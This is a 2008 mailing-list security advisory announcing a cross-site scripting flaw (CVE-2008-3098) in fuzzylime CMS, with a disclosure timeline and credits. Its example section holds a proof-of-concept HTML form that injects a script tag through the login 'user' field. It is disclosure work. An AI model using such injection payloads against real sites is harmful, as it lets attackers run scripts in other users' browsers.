lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080922182812.182899df@mobile.fabian.datensalat.eu>
Date: Mon, 22 Sep 2008 18:28:12 +0000
From: Fabian Fingerle <fabian@...ensalat.eu>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Cross Site Scripting (XSS) Vulnerabilitiy in
 fuzzylime (cms) >=3.02, CVE-2008-3098

Cross Site Scripting (XSS) Vulnerabilitiy in fuzzylime (cms) >=3.02,
CVE-2008-3098 

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3098
http://cms.fuzzylime.co.uk
http://www.datensalat.eu/~fabian/cve/CVE-2008-3098-fuzzylime-cms.html


Description

Fuzzylime (cms) is a way to run websites and keep it up-to-date. Once
installed, you can update from any internet-connected PC in the world -
you don't even need to know HTML! It has tons of features so whatever
you want from your site, chances are this script will be able to do it
for you. 

Example

Assuming Fuzzylime is installed on http://localhost/fuzzylime/, anybody
could inject JavaScript:

<form method="post"
action="http://localhost/fuzzylime/admin/usercheck.php"> <input
type="hidden" name="log" value="in"> <input type="text"
name="user"value='"><script>alert(1)</script>'> <input
type=submit></form>

Disclosure Timeline

2008-09-10 Vendor contacted
2008-09-20 Vendor released 3.03
2008-09-22 Advisory published

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3098 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems. 

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with
help from Hanno Boeck). It's licensed under the creative commons
attribution license.

Fabian Fingerle, 2008-09-22, http://www.fabian-fingerle.de

Download attachment "signature.asc" of type "application/pgp-signature" (198 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ